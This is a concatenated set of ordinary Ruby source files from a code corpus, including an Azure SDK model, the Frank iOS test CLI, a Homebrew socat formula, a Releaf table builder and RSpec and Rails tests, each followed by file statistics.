# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Network::Mgmt::V2019_04_01
module Models
#
# Result of the request to list all P2SVpnServerConfigurations associated
# to a VirtualWan. It contains a list of P2SVpnServerConfigurations and a
# URL nextLink to get the next set of results.
#
class ListP2SVpnServerConfigurationsResult
include MsRestAzure
include MsRest::JSONable
# @return [Array<P2SVpnServerConfiguration>] List of
# P2SVpnServerConfigurations.
attr_accessor :value
# @return [String] URL to get the next set of operation list results if
# there are any.
attr_accessor :next_link
# return [Proc] with next page method call.
attr_accessor :next_method
#
# Gets the rest of the items for the request, enabling auto-pagination.
#
# @return [Array<P2SVpnServerConfiguration>] operation results.
#
def get_all_items
items = @value
page = self
while page.next_link != nil && !page.next_link.strip.empty? do
page = page.get_next_page
items.concat(page.value)
end
items
end
#
# Gets the next page of results.
#
# @return [ListP2SVpnServerConfigurationsResult] with next page content.
#
def get_next_page
response = @next_method.call(@next_link).value! unless @next_method.nil?
unless response.nil?
@next_link = response.body.next_link
@value = response.body.value
self
end
end
#
# Mapper for ListP2SVpnServerConfigurationsResult class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'ListP2SVpnServerConfigurationsResult',
type: {
name: 'Composite',
class_name: 'ListP2SVpnServerConfigurationsResult',
model_properties: {
value: {
client_side_validation: true,
required: false,
serialized_name: 'value',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'P2SVpnServerConfigurationElementType',
type: {
name: 'Composite',
class_name: 'P2SVpnServerConfiguration'
}
}
}
},
next_link: {
client_side_validation: true,
required: false,
serialized_name: 'nextLink',
type: {
name: 'String'
}
}
}
}
}
end
end
end
end
| 30.048544 | 80 | 0.557997 |
7a3659c128fdda56c42382161366070a259fc030 | 247 | require "sprockets"
require "sprockets/es6"
require "roger_sprockets/version"
module RogerSprockets; end
# Load modules
require File.dirname(__FILE__) + "/roger_sprockets/middleware"
require File.dirname(__FILE__) + "/roger_sprockets/processor"
| 24.7 | 62 | 0.805668 |
79d9aa706074a30da2a80cc1ef85ecc140230c4f | 3,116 | # frozen_string_literal: true
# The Jak namespace
module Jak
  # The MyAbility Class which is the child of JakAbility.
  # Translates the resource's persisted permissions into CanCan `can`
  # grants, optionally scoped to the resource's tenant.
  class MyAbility < JakAbility
    # @param resource [Object] the subject (e.g. a user) whose permissions
    #   are loaded; must respond to #permissions(namespace).
    def initialize(resource, &block)
      # Invoke Jak Ability methods
      super do
        instance_eval(&block) if block_given?
      end
      # Bail out early
      unless resource.present?
        puts 'Jak::MyAbility.initialize - Bail out No Resource Present!'
        return
      end
      # This is the dynamic permission functionality
      # @yielded_namespaces is presumably populated by JakAbility/super —
      # TODO(review): confirm in the parent class.
      @yielded_namespaces.each do |namespace|
        next unless resource.respond_to?(:permissions, namespace)
        my_namespace = Jak.namespace_manager.find(namespace)
        # 360 no namespace
        raise NotImplementedError, "Namespace: '#{namespace}' was not found!" unless my_namespace
        if my_namespace.scoped_to_tenant?
          # Limited by Jak.tenant_id_column
          tenant_id_column = "#{Jak.tenant_id_column}_id"
          # Unrestricted Permissions: Not limited to the current_user per se.
          resource.permissions(namespace).select { |k| k.restricted == false }.each do |permission|
            # Check the resources permissions
            if permission.klass.constantize.column_names.include?(tenant_id_column)
              # Does this model have a tenant_id column in it...
              can permission.action.to_sym, permission.klass.constantize, tenant_id_column.to_sym => resource.send(tenant_id_column)
            else
              # Is it the tenant itself?
              can permission.action.to_sym, permission.klass.constantize, id: resource.send(tenant_id_column)
            end
          end
          # Restricted Permissions: Limit to not only the tenant (optionally), but to the column specified
          # For example:
          #   can :show, Lead, company_id: current_user.company_id, assignable_id: user.id
          # Is saying that they can show the leads for the company they're a part of and for leads assigned to this User.
          resource.permissions(namespace).select { |k| k.restricted == true }.each do |permission|
            # Check the resources permissions
            if permission.klass.constantize.column_names.include?(tenant_id_column)
              # puts "Doing that thing you want, for namespace: '#{namespace}', for klass: '#{permission.klass}', upon action of '#{permission.action}'"
              can permission.action.to_sym, permission.klass.constantize, tenant_id_column.to_sym => resource.send(tenant_id_column), permission.klass.constantize.send("my_#{namespace}_restrictions").to_sym => resource.id
            else
              # Is it the tenant itself?
              can permission.action.to_sym, permission.klass.constantize, id: resource.send(tenant_id_column)
            end
          end
        else
          # Absolute power! (Not restricted by Jak.tenant_id_column)
          resource.permissions(namespace).each do |permission|
            can permission.action.to_sym, permission.klass.constantize
          end
        end
      end # end @yielded_namespaces.each
    end # end initialize
  end
end
| 45.823529 | 221 | 0.667202 |
61bd8a1c0e73022150135a4f8d2b3a3d945c41ff | 14,013 | begin
require 'pry'
rescue LoadError
end
require 'thor'
require 'frank-cucumber/launcher'
require 'frank-cucumber/console'
require 'frank-cucumber/frankifier'
require 'frank-cucumber/mac_launcher'
require 'frank-cucumber/plugins/plugin'
require 'xcodeproj'
module Frank
class CLI < Thor
include Thor::Actions
# Thor::Actions template root: the bundled frank-skeleton directory.
def self.source_root
  File.join( File.dirname(__FILE__), '..','..','frank-skeleton' )
end

# included just because the old setup script was called frank-skeleton
desc "skeleton", "an alias for setup"
def skeleton
  invoke :setup
end
# CLI flag names for opting out of optional embedded libraries.
WITHOUT_SERVER = "without-cocoa-http-server"
WITHOUT_ASYNC_SOCKET = "without-cocoa-async-socket"
WITHOUT_LUMBERJACK = "without-cocoa-lumberjack"

desc "setup", "set up your iOS app by adding a Frank subdirectory containing everything Frank needs"
method_option WITHOUT_SERVER, :type => :boolean
method_option WITHOUT_ASYNC_SOCKET, :type => :boolean
method_option WITHOUT_LUMBERJACK, :type => :boolean
method_option :build_configuration, :aliases=>'--conf', :type=>:string, :default => 'Debug'
method_option :target, :type=>:string
method_option :project, :type=>:string
def setup
  # Full library sets for iOS and Mac; @libs/@libsMac are read by the
  # skeleton templates copied below.
  @libs = %w(Shelley CocoaAsyncSocket CocoaLumberjack CocoaHTTPServer Frank)
  @libsMac = %w(ShelleyMac CocoaAsyncSocketMac CocoaLumberjackMac CocoaHTTPServerMac FrankMac)
  # Drop any libraries the user opted out of.
  @libs -= %w(CocoaHTTPServer) if options[WITHOUT_SERVER]
  @libsMac -= %w(CocoaHTTPServerMac) if options[WITHOUT_SERVER]
  @libs -= %w(CocoaAsyncSocket) if options[WITHOUT_ASYNC_SOCKET]
  @libsMac -= %w(CocoaAsyncSocketMac) if options[WITHOUT_ASYNC_SOCKET]
  @libs -= %w(CocoaLumberjack) if options[WITHOUT_LUMBERJACK]
  @libsMac -= %w(CocoaLumberjackMac) if options[WITHOUT_LUMBERJACK]
  # Copy the skeleton into ./Frank, then wire it into the Xcode project.
  directory ".", "Frank"
  Frankifier.frankify!( File.expand_path('.'), :build_config => options[:build_configuration], :target => options[:target], :project => options[:project] )
end
desc "update", "updates the frank server components inside your Frank directory"
long_desc "This updates the parts of Frank that are embedded inside your app (e.g. libFrank.a and frank_static_resources.bundle)"
def update
  # Refresh every embedded static library (iOS and Mac variants).
  %w{libFrank.a libCocoaAsyncSocket.a libCocoaLumberjack.a libCocoaHTTPServer.a libShelley.a libFrankMac.a libShelleyMac.a libCocoaAsyncSocketMac.a libCocoaLumberjackMac.a libCocoaHTTPServerMac.a}.each do |f|
    copy_file f, File.join( 'Frank', f ), :force => true
  end
  directory( 'frank_static_resources.bundle', 'Frank/frank_static_resources.bundle', :force => true )
  # Stale object files would otherwise keep linking the old libraries.
  if yes? "\nOne or more static libraries may have been updated. For these changes to take effect the 'frankified_build' directory must be cleaned. Would you like me to do that now? Type 'y' or 'yes' to delete the contents of frankified_build."
    remove_file('Frank/frankified_build')
  end
end
# xcodebuild flags that are forwarded verbatim when given as CLI options.
XCODEBUILD_OPTIONS = %w{workspace project scheme target configuration}

desc "build [<buildsetting>=<value>]...", "builds a Frankified version of your native app"
XCODEBUILD_OPTIONS.each do |option|
  method_option option
end
WITHOUT_DEPS = 'without-dependencies'
method_option 'no-plugins', :type => :boolean, :default => false, :aliases => '--np', :desc => 'Disable plugins'
method_option 'arch', :type => :string, :default => 'i386'
method_option :noclean, :type => :boolean, :default => false, :aliases => '--nc', :desc => "Don't clean the build directory before building"
method_option WITHOUT_DEPS, :type => :array, :desc => 'An array (space separated list) of plugin dependencies to exclude'
def build(*args)
  clean = !options['noclean']
  use_plugins = !options['no-plugins']
  exclude_dependencies = options[WITHOUT_DEPS] || []

  # Offer to run setup first if the Frank directory is missing.
  in_root do
    unless File.directory? 'Frank'
      if yes? "You don't appear to have set up a Frank directory for this project. Would you like me to set that up now? Type 'y' or 'yes' if so."
        invoke :skeleton
      else
        say "OK, in that case there's not much I can do for now. Whenever you change your mind and want to get your project setup with Frank simply run `frank setup` from the root of your project directory."
        say "Bye bye for now!"
        exit 11
      end
    end
  end

  static_bundle = 'frank_static_resources.bundle'

  if clean
    remove_dir build_output_dir
  end

  build_steps = 'build'
  if clean
    build_steps = 'clean ' + build_steps
  end

  # Generate xcconfig entries for Frank core plus any detected plugins.
  plugins = use_plugins ? gather_plugins : []
  say "Detected plugins: #{plugins.map {|p| p.name}.join(', ')}" unless plugins.empty?
  say "Excluding plugin dependencies: #{exclude_dependencies.join(', ')}" unless exclude_dependencies.empty?

  plugins.each {|plugin| plugin.write_xcconfig(exclude_dependencies)}

  xcconfig_data = Frank::Plugins::Plugin.generate_core_xcconfig(plugins)
  xcconfig_file = 'Frank/frank.xcconfig'
  File.open(xcconfig_file,'w') {|f| f.write(xcconfig_data) }

  extra_opts = XCODEBUILD_OPTIONS.map{ |o| "-#{o} \"#{options[o]}\"" if options[o] }.compact.join(' ')

  # If there is a scheme specified we don't want to inject the default configuration
  # If there is a configuration specified, we also do not want to inject the default configuration
  if options['scheme'] || options['configuration']
    separate_configuration_option = ""
  else
    separate_configuration_option = "-configuration Debug"
  end

  build_mac = determine_build_patform(options) == :osx

  xcodebuild_args = args.join(" ")

  # Mac builds skip the simulator SDK/arch flags used for iOS builds.
  if build_mac
    run %Q|xcodebuild -xcconfig #{xcconfig_file} #{build_steps} #{extra_opts} #{separate_configuration_option} DEPLOYMENT_LOCATION=YES DSTROOT="#{build_output_dir}" FRANK_LIBRARY_SEARCH_PATHS="#{frank_lib_search_paths}" #{xcodebuild_args}|
  else
    extra_opts += " -arch #{options['arch']}"
    run %Q|xcodebuild -xcconfig #{xcconfig_file} #{build_steps} #{extra_opts} #{separate_configuration_option} -sdk iphonesimulator ONLY_ACTIVE_ARCH=NO DEPLOYMENT_LOCATION=YES DSTROOT="#{build_output_dir}" FRANK_LIBRARY_SEARCH_PATHS="#{frank_lib_search_paths}" #{xcodebuild_args}|
  end

  exit $?.exitstatus if not $?.success?

  # Locate the freshly-built .app (ignoring a pre-existing Frankified.app)
  # and copy it into the canonical Frankified.app location.
  app = Dir.glob("#{build_output_dir}/*.app").delete_if { |x| x =~ /\/#{app_bundle_name}$/ }
  app = app.first
  FileUtils.cp_r("#{app}/.", frankified_app_dir)

  if build_mac
    in_root do
      FileUtils.cp_r(
        File.join( 'Frank',static_bundle),
        File.join( frankified_app_dir, "Contents", "Resources", static_bundle )
      )
    end
  else
    fix_frankified_apps_bundle_identifier

    in_root do
      FileUtils.cp_r(
        File.join( 'Frank',static_bundle),
        File.join( frankified_app_dir, static_bundle )
      )
    end
  end
end
desc "build_and_launch", "rebuild a Frankfied version of your app then launch"
def build_and_launch
  # Convenience task: build followed by launch.
  invoke :build
  invoke :launch
end
desc "launch", "open the Frankified app in the simulator"
method_option :debug, :type => :boolean, :default => false
method_option :idiom, :banner => 'iphone|ipad', :type => :string, :default => (ENV['FRANK_SIM_IDIOM'] || 'iphone')
def launch
  $DEBUG = options[:debug]
  # Pick a simulator client for the requested device idiom.
  launcher = case options[:idiom].downcase
  when 'iphone'
    SimLauncher::DirectClient.for_iphone_app( frankified_app_dir )
  when 'ipad'
    SimLauncher::DirectClient.for_ipad_app( frankified_app_dir )
  else
    say "idiom must be either iphone or ipad. You supplied '#{options[:idiom]}'", :red
    exit 10
  end

  in_root do
    unless File.exists? frankified_app_dir
      say "A Frankified version of the app doesn't appear to have been built. Building one now"
      say "..."
      invoke :build
    end

    # Mac builds bypass the simulator and are launched directly.
    if built_product_is_mac_app( frankified_app_dir )
      launcher = Frank::MacLauncher.new( frankified_app_dir )
      say "LAUNCHING APP..."
    else
      say "LAUNCHING IN THE SIMULATOR..."
    end

    launcher.relaunch
  end
end
desc "inspect", "launch Symbiote in the browser"
long_desc "launch Symbiote in the browser so you can inspect the live state of your Frankified app"
# NOTE(review): this Thor task shadows Object#inspect on the CLI instance;
# apparently intentional (task names are user-facing), but worth knowing.
def inspect
  # TODO: check whether app is running (using ps or similar), and launch it if it's not
  run 'open http://localhost:37265'
end
desc 'console', "launch a ruby console connected to your Frankified app"
method_option :bonjour, :type => :boolean, :default => false, :aliases => :b, :desc => "find Frank via Bonjour."
method_option :server, :type => :string, :default => false, :aliases => :s, :desc => "server URL for Frank."
def console
  # TODO: check whether app is running (using ps or similar), and launch it if it's not

  # pry is an optional dependency; bail with guidance if it's missing.
  begin
    require 'pry'
  rescue LoadError
    say 'The Frank console requires the pry gem.'
    say 'Simply run `sudo gem install pry` (the `sudo` bit might be optional), and then try again. Thanks!'
    exit 41
  end

  Frank::Cucumber::FrankHelper.use_shelley_from_now_on
  console = Frank::Console.new
  Frank::Cucumber::FrankHelper.test_on_physical_device_via_bonjour if options[:bonjour]
  Frank::Cucumber::FrankHelper.server_base_url = options[:server] if options[:server]
  if console.check_for_running_app
    console.pry
  end
end
private
# Name of the instrumented build product.
def product_name
  "Frankified"
end

# Bundle name of the instrumented app.
def app_bundle_name
  "#{product_name}.app"
end

# Absolute path of the project's Frank directory.
def frank_lib_directory
  File.expand_path "Frank"
end

# Escaped, space-joined library search paths (Frank dir plus every
# plugin directory) for embedding in the xcodebuild command line.
def frank_lib_search_paths
  paths = [frank_lib_directory]

  each_plugin_path do |path|
    paths << path
  end

  paths.map {|path| %Q[\\"#{path}\\"]}.join(' ')
end

# Where xcodebuild deposits the Frankified build (DSTROOT).
def build_output_dir
  File.expand_path "Frank/frankified_build"
end

# Full path of the Frankified .app bundle.
def frankified_app_dir
  File.join( build_output_dir, app_bundle_name )
end

# Directory holding Frank plugins for this project.
def plugin_dir
  File.expand_path 'Frank/plugins'
end

# Heuristic: Mac app bundles contain Contents/MacOS; iOS bundles do not.
def built_product_is_mac_app ( app_dir )
  return File.exists? File.join( app_dir, "Contents", "MacOS" )
end
def fix_frankified_apps_bundle_identifier
  # as of iOS 6 the iOS Simulator locks up with a black screen if you try and launch an app which has the same
  # bundle identifier as a previously installed app but which is in fact a different app. This impacts us because our
  # Frankified app is different but has the same bundle identifier as the standard non-Frankified app which most users
  # will want to have installed in the simulator as well.
  #
  # We work around this by modifying the Frankified app's bundle identifier inside its Info.plist.
  inside frankified_app_dir do
    existing_bundle_identifier = `/usr/libexec/PlistBuddy -c 'Print :CFBundleIdentifier' Info.plist`.chomp
    new_bundle_identifier = existing_bundle_identifier + '.frankified'
    run %Q|/usr/libexec/PlistBuddy -c 'Set :CFBundleIdentifier #{new_bundle_identifier}' Info.plist|
    run %Q|/usr/libexec/PlistBuddy -c 'Set :CFBundleDisplayName Frankified' Info.plist|
  end
end
# The xcodeproj gem doesn't currently support schemes, and schemes have been difficult
# to figure out. I plan to either implement schemes in xcodeproj at a later date, or
# wait for them to be implemented, and then fix this function
#
# Returns :osx or :ios (falling back to :ios when no target can be
# determined). Resolves the project via --workspace/--scheme, --project,
# or by scanning the cwd for a single .xcodeproj.
# NOTE(review): method name carries a typo ("patform") — kept because the
# build task calls it by this exact name.
def determine_build_patform ( options )
  project_path = nil
  if options["workspace"] != nil
    if options["scheme"] != nil
      # Scan every project in the workspace for one that lists the scheme.
      workspace = Xcodeproj::Workspace.new_from_xcworkspace(options["workspace"])
      projects = workspace.projpaths

      projects.each { | current_project |
        # Parse `xcodebuild -list` output; scheme names appear indented
        # under a "Schemes:" heading.
        lines = `xcodebuild -project "#{current_project}" -list`
        found_schemes = false
        lines.split("\n").each { | line |
          if found_schemes
            line = line[8..-1]
            if line == ""
              found_schemes = false
            else
              if line == options["scheme"]
                project_path = current_project
              end
            end
          else
            line = line [4..-1]
            if line == "Schemes:"
              found_schemes = true
            end
          end
        }
      }
    else
      say "You must specify a scheme if you specify a workplace"
      exit 10
    end
  else
    project_path = options["project"]
  end
  if project_path == nil
    # No explicit project: require exactly one .xcodeproj in the cwd.
    Dir.foreach(Dir.pwd) { | file |
      if file.end_with? ".xcodeproj"
        if project_path != nil
          say "You must specify a project if there are more than one .xcodeproj bundles in a directory"
          exit 10
        else
          project_path = file
        end
      end
    }
  end

  project = Xcodeproj::Project.new(project_path)
  target = nil
  if options["target"] != nil
    project.targets.each { | proj_target |
      if proj_target.name == options["target"]
        target = proj_target
      end
    }
  else
    target = project.targets[0]
  end
  if target == nil
    say "Unable to determine a target from the options provided. Assuming iOS"
    return :ios
  end
  return target.platform_name
end
# Yields the path of every entry under the Frank plugin directory,
# returning the mapped results.
def each_plugin_path(&block)
  Dir[File.join("#{plugin_dir}", '*')].map { |plugin_path| yield plugin_path }
end

# Builds a Plugin object for every plugin found in the plugin directory.
def gather_plugins
  each_plugin_path { |plugin_path| Frank::Plugins::Plugin.from_plugin_directory(plugin_path) }
end
end
end
| 36.492188 | 284 | 0.651752 |
ff7da39a7ba452940f4101f006112b17a82e3a0e | 2,045 | require 'test_helper'
# Model tests for User validations and authentication helpers.
class UserTest < ActiveSupport::TestCase

  def setup
    @user = User.new(name: "Example User", email: "[email protected]", password: "foobar", password_confirmation: "foobar")
  end

  test "should be valid" do
    assert @user.valid?
  end

  test "name should be present" do
    @user.name = "     "
    assert_not @user.valid?
  end

  test "email should be present" do
    @user.email = "     "
    assert_not @user.valid?
  end

  test "name should not be too long" do
    @user.name = "a" * 51
    assert_not @user.valid?
  end

  test "email should not be too long" do
    @user.email = "a" * 244 + "@example.com"
    assert_not @user.valid?
  end

  test "email validation should accept valid addresses" do
    valid_addresses = %w[[email protected] [email protected] [email protected]
                         [email protected] [email protected]]
    valid_addresses.each do |valid_address|
      @user.email = valid_address
      assert @user.valid?, "#{valid_address.inspect} should be valid"
    end
  end

  test "email validation should reject invalid addresses" do
    invalid_addresses = %w[user@example,com user_at_foo.org user.name@example.
                           foo@bar_baz.com foo@bar+baz.com]
    invalid_addresses.each do |invalid_address|
      @user.email = invalid_address
      assert_not @user.valid?, "#{invalid_address.inspect} should be invalid"
    end
  end

  test "email addresses should be unique" do
    duplicate_user = @user.dup
    @user.save
    assert_not duplicate_user.valid?
  end

  test "password should be present (nonblank)" do
    @user.password = @user.password_confirmation = " " * 6
    assert_not @user.valid?
  end

  test "password should have a minimum length" do
    @user.password = @user.password_confirmation = "a" * 5
    assert_not @user.valid?
  end

  # BUG FIX: there were previously TWO tests declared with this exact
  # description. ActiveSupport's declarative `test` helper raises
  # "test_... is already defined" on duplicate names, so the file could
  # not even load. The stale single-argument variant
  # (`@user.authenticated?('')`) has been removed in favor of the
  # two-argument form matching the model's authenticated?(attribute, token).
  test "authenticated? should return false for a user with nil digest" do
    assert_not @user.authenticated?(:remember, '')
  end
end
01c549fa4a3c6ca5aac376fde52ee3b0ba64fe3c | 1,072 | class Socat < Formula
desc "netcat on steroids"
homepage "http://www.dest-unreach.org/socat/"
url "http://www.dest-unreach.org/socat/download/socat-1.7.3.2.tar.gz"
sha256 "ce3efc17e3e544876ebce7cd6c85b3c279fda057b2857fcaaf67b9ab8bdaf034"
bottle do
cellar :any
sha256 "63cba17ba8512ae70e018d6e918b67e4d3646bbd44b6aa77d7e4c92833f4a79c" => :sierra
sha256 "65e0fd67dbb8f8615110beb7a10710aa73ec8cd4dcfb19408558a56d368728e2" => :el_capitan
sha256 "8bbbe3d993e937ee42499de4efdf02c168c97b30bb75077e5489c4b165829e1f" => :yosemite
end
devel do
url "http://www.dest-unreach.org/socat/download/socat-2.0.0-b9.tar.gz"
version "2.0.0-b9"
sha256 "f9496ea44898d7707507a728f1ff16b887c80ada63f6d9abb0b727e96d5c281a"
end
depends_on "readline"
depends_on "openssl"
def install
system "./configure", "--prefix=#{prefix}", "--mandir=#{man}"
system "make", "install"
end
test do
output = pipe_output("#{bin}/socat - tcp:www.google.com:80", "GET / HTTP/1.0\r\n\r\n")
assert_match "HTTP/1.0", output.lines.first
end
end
| 32.484848 | 92 | 0.738806 |
62f7a738045c338736b769ccb7c19d33a2176883 | 6,752 | class Releaf::Builders::TableBuilder
include Releaf::Builders::Base
include Releaf::Builders::Toolbox
attr_accessor :collection, :options, :template, :resource_class
def initialize(collection, resource_class, template, options)
self.collection = collection
self.options = options
self.template = template
self.resource_class = resource_class
end
def column_names
Releaf::ResourceTableFields.new(resource_class).values(include_associations: false)
end
def columns
@columns ||= columns_schema
end
def columns_schema
data = {}
final_column_names = []
final_column_names += column_names
final_column_names << :toolbox if options[:toolbox] == true
final_column_names.map do|column|
if cell_method(column)
data[column] = {cell_method: cell_method(column)}
elsif cell_content_method(column)
data[column] = {content_method: cell_content_method(column)}
else
data[column] = {format_method: cell_format_method(column)}
end
end
data
end
def output
tag(:table, table_attributes) do
if collection.empty?
empty_body
else
head << body
end
end
end
def table_attributes
{class: ["table", resource_class.name.pluralize.underscore.dasherize]}
end
def head
tag(:thead) do
tag(:tr) do
content = ActiveSupport::SafeBuffer.new
columns.each_pair do|column, _options|
content << head_cell(column)
end
content
end
end
end
def head_cell(column)
tag(:th) do
head_cell_content(column)
end
end
def head_cell_content(column)
unless column.to_sym == :toolbox
attribute = column.to_s.tr(".", "_")
resource_class.human_attribute_name(attribute)
end
end
def empty_body
tag(:tr) do
tag(:th) do
tag(:div, class: "nothing-found") do
t("Nothing found")
end
end
end
end
def body
tag(:tbody, class: "tbody") do
collection.collect do |resource|
row(resource)
end
end
end
def row_url(resource)
resource_action = row_url_action(resource)
url_for(action: resource_action, id: resource.id, index_path: index_path) if resource_action
end
def row_url_action(_resource)
if feature_available?(:show)
:show
elsif feature_available?(:edit)
:edit
end
end
def row_attributes(resource)
{
class: "row",
data: {
id: resource.id
}
}
end
def row(resource)
url = row_url(resource)
tag(:tr, row_attributes(resource)) do
content = ActiveSupport::SafeBuffer.new
columns.each_pair do|column, options|
cell_options = options.merge(url: url)
if options[:cell_method]
content << send(options[:cell_method], resource, cell_options)
else
content << cell(resource, column, cell_options)
end
end
content
end
end
def cell_content(resource, column, options)
if options[:content_method]
send(options[:content_method], resource)
else
send(options[:format_method], resource, column)
end
end
def format_text_content(resource, column)
truncate(column_value(resource, column).to_s, length: 32, separator: ' ')
end
def format_textarea_content(resource, column)
format_text_content(resource, column)
end
def format_richtext_content(resource, column)
value = ActionView::Base.full_sanitizer.sanitize(column_value(resource, column).to_s)
truncate(value, length: 32, separator: ' ')
end
def format_string_content(resource, column)
value = column_value(resource, column)
resource_title(value)
end
def format_boolean_content(resource, column)
t(column_value(resource, column) == true ? "Yes" : "No")
end
def format_date_content(resource, column)
value = column_value(resource, column)
I18n.l(value, format: :default) unless value.nil?
end
def format_datetime_content(resource, column)
value = column_value(resource, column)
format = Releaf::Builders::Utilities::DateFields.date_or_time_default_format(:datetime)
I18n.l(value, format: format) unless value.nil?
end
def format_time_content(resource, column)
value = column_value(resource, column)
format = Releaf::Builders::Utilities::DateFields.date_or_time_default_format(:time)
I18n.l(value, format: format) unless value.nil?
end
def format_association_content(resource, column)
format_string_content(resource, association_name(column))
end
def association_name(column)
column.to_s.sub(/_id$/, '').to_sym
end
def cell_method(column)
method_name = "#{column}_cell"
if respond_to? method_name
method_name
else
nil
end
end
def cell_content_method(column)
method_name = "#{column}_content"
if respond_to? method_name
method_name
else
nil
end
end
def column_type(klass, column)
column_description = klass.columns_hash[column.to_s]
if column_description
column_description.type
else
:string
end
end
def column_type_format_method(column)
klass = column_klass(resource_class, column)
type = column_type(klass, column)
type_format_method(type)
end
def type_format_method(type)
format_method = "format_#{type}_content".to_sym
if respond_to?(format_method)
format_method
else
:format_string_content
end
end
def column_klass(klass, column)
column.to_s.split(".")[0..-2].each do|part|
reflection = klass.reflect_on_association(part)
klass = reflection.klass if reflection
end
klass
end
def column_value(resource_or_value, column)
column.to_s.split(".").each do|part|
resource_or_value = resource_or_value.send(part) if resource_or_value.present?
end
resource_or_value
end
def cell_format_method(column)
if association_column?(column)
:format_association_content
else
column_type_format_method(column)
end
end
def association_column?(column)
!!(column =~ /_id$/) && resource_class.reflections[association_name(column).to_s].present?
end
def toolbox_cell(resource, options)
toolbox_args = {index_path: index_path}.merge(options.fetch(:toolbox, {}))
tag(:td, class: "only-icon toolbox-cell") do
toolbox(resource, toolbox_args)
end
end
def cell(resource, column, options)
content = cell_content(resource, column, options)
tag(:td) do
if options[:url].blank?
tag(:span) do
content
end
else
tag(:a, href: options[:url]) do
content
end
end
end
end
end
| 23.526132 | 96 | 0.674467 |
1146ac3fb2c2c3aed00d65a8f4bd30976f16bf41 | 811 | require "test_helper"
class Stats::ConversationTest < ActiveSupport::TestCase
setup do
Conversation.create!(developer: developers(:one), business: businesses(:one))
end
test "#sent counts all conversations" do
stats = Stats::Conversation.new(Conversation.all)
assert_equal 2, stats.sent
end
test "#replied counts conversations with a developer response" do
stats = Stats::Conversation.new(Conversation.all)
assert_equal 1, stats.replied
end
test "#replied_rate calcualtes the percentage of replied conversations" do
stats = Stats::Conversation.new(Conversation.all)
assert_equal 0.5, stats.replied_rate
end
test "#replied_rate handles no sent messages" do
stats = Stats::Conversation.new(Conversation.none)
assert_equal 0, stats.replied_rate
end
end
| 28.964286 | 81 | 0.749692 |
4aa2a0eaed6e06e61964254843984d8e0fd69866 | 152 | #
# Cookbook:: build_cookbook
# Recipe:: syntax
#
# Copyright:: 2017, Exosphere Data, LLC, All Rights Reserved.
include_recipe 'delivery-truck::syntax'
| 21.714286 | 61 | 0.743421 |
f8556e2e2a4735933eeaf2f1355dfb5604d503c6 | 590 | Numeric.unit = 20 # set to 1 for export at real scale, 10 or more for designing
GRID = true # turn on or off the grid lines
union do
difference do
union do
union do
(n_teeth = 4).times do |t|
a = 180.0 / n_teeth * t
rect(~2, ~16)[~-1, ~-8].rotate(a)
end
end
circle(~6)
end
circle(~4)
end
iso_tri(~6, ~3, fill: :red).flip_x.move(0, ~2)
end.move(~8, ~8)
(1..15).each do |i| # 16px grid
path([~i, 0], [~i, ~16], stroke: "orange", opacity: 0.6)
path([0, ~i], [~16, ~i], stroke: "orange", opacity: 0.6)
end if GRID
| 22.692308 | 79 | 0.538983 |
39c0ce363555f8f0621868ff580d9fc2dc26be16 | 62 | json.partial! "categoria/categorium", categorium: @categorium
| 31 | 61 | 0.806452 |
2690caa8987129904ff66fe9890a193614513df9 | 4,077 | # frozen_string_literal: true
require_relative '../../../../src/bin/helpers/gitlab/chart.rb'
require 'tmpdir'
describe Gitlab::Chart do
describe '.load_from_helm_ls' do
subject { described_class.load_from_helm_ls(data, release_name) }
let(:release_name) { 'production' }
let(:data) do
<<~EOS
[
{
"name": "production",
"revision": 1,
"updated":"2020-08-18 11:26:58.055761 -0400 EDT",
"status": "deployed",
"chart": "auto-deploy-app-1.2.3",
"app_version": "",
"namespace": "new-sentimentality-19561312-production"
},
{
"name": "production-canary",
"revision": 2,
"updated":"2020-08-18 11:26:58.055761 -0400 EDT",
"status": "deployed",
"chart": "auto-deploy-app-4.5.6",
"app_version": "",
"namespace": "new-sentimentality-19561312-production"
},
{
"name": "production-postgresql",
"revision": 9,
"updated":"2020-08-18 11:26:58.055761 -0400 EDT",
"status": "deployed",
"chart": "postgresql-8.2.1",
"app_version": "11.6.0",
"namespace": "new-sentimentality-19561312-production"
}
]
EOS
end
it 'correctly loads the chart' do
expect(subject.major).to eq(1)
expect(subject.minor).to eq(2)
expect(subject.patch).to eq(3)
end
context 'when release name is canary' do
let(:release_name) { 'production-canary' }
it 'correctly loads the chart' do
expect(subject.major).to eq(4)
expect(subject.minor).to eq(5)
expect(subject.patch).to eq(6)
end
end
context 'when release name does not exist' do
let(:release_name) { 'production-unknown' }
it 'returns nil' do
expect(subject).to be_nil
end
end
context 'when chart is not gitlab managed chart' do
let(:release_name) { 'production-postgresql' }
it 'returns nil' do
expect(subject).to be_nil
end
end
context 'when data is empty' do
let(:data) { '[]' }
it 'returns nil' do
expect(subject).to be_nil
end
end
context 'when data is nil' do
let(:data) { nil }
it 'raises an error' do
expect { subject }.to raise_error(TypeError)
end
end
context 'when data is not formatted in json' do
let(:data) { 'test' }
it 'raises an error' do
expect { subject }.to raise_error(JSON::ParserError)
end
end
end
describe '.load_from_chart_yml' do
let(:chart_yaml) do
<<~EOS
apiVersion: v1
description: GitLab's Auto-deploy Helm Chart
name: auto-deploy-app
version: 1.0.3
icon: https://gitlab.com/gitlab-com/gitlab-artwork/raw/master/logo/logo-square.png
EOS
end
it 'correctly loads the chart' do
in_chart_dir do |dir|
chart = described_class.load_from_chart_yml(dir)
expect(chart.major).to eq(1)
expect(chart.minor).to eq(0)
expect(chart.patch).to eq(3)
end
end
context 'when chart is not gitlab managed chart' do
let(:chart_yaml) do
<<~EOS
apiVersion: v1
description: GitLab's Auto-deploy Helm Chart
name: custom-chart
version: 1.0.3
icon: https://gitlab.com/gitlab-com/gitlab-artwork/raw/master/logo/logo-square.png
EOS
end
it 'returns nil' do
in_chart_dir do |dir|
chart = described_class.load_from_chart_yml(dir)
expect(chart).to be_nil
end
end
end
context 'when chart yaml is not found' do
it 'raises an error' do
expect { described_class.load_from_chart_yml('test') }.to raise_error(Errno::ENOENT)
end
end
def in_chart_dir
Dir.mktmpdir do |dir|
File.write("#{dir}/Chart.yaml", chart_yaml)
yield dir
end
end
end
end
| 25.803797 | 92 | 0.566348 |
